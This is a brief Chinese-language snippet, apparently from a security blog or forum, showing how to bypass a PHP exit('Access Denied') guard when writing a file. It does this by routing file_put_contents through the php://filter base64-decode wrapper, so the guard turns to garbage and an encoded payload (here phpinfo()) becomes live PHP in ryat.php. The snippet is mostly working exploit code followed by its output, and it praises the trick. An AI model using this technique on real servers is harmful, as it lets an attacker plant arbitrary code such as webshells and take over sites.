绕过 <?PHP exit('Access Denied'); ?> 限制
<?php
$shellcode='PD9waHBpbmZvKCk7Pz4';// base64_decode <?phpinfo();?>
$endstr='s';
$timestamp=$endstr.$shellcode;
file_put_contents("php://filter/write=convert.base64-decode/resource=ryat.php","<?PHP exit('Access Denied'); ?> $timestamp");
?>
利用base64产生乱码可以生成:
<s奁+@q乾? 鏩<?phpinfo();?>
就绕过了exit()限制,真厉害呀